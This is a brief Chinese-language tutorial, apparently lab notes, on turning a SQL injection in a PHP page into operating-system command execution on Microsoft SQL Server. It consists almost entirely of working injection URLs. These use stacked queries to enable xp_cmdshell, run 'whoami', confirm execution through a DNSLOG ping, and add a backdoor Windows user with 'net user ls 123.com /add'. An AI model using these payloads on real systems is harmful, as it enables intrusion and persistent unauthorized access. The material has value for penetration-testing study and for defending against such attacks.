一、首先要进入master,这里要用;隔开,有点类似堆叠查询
输入:http://192.168.1.106/1.php?id=1;use master;可看到没什么变化
二、开启高级功能
输入:http://192.168.1.106/1.php?id=1;use master;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;可看到这几句话正常执行
三、执行系统命令
输入:?id=1;use master;exec master..xp_cmdshell "whoami";
四、检测命令是否执行成功,可用DNSLOG在线测试
1.获取一个网址
2.输入:http://192.168.1.106/1.php?id=1;use master;exec master..xp_cmdshell 'ping -n 1 ijcpjw.dnslog.cn';ping该网址,看是否ping通,出现记录说明命令执行成功
四、给系统添加用户
输入:http://192.168.1.106/1.php?id=1;use master;exec master..xp_cmdshell 'net user ls 123.com /add';可看到执行成功
五、验证用户是否创建成功
验证成功添加ls用户,说明执行成功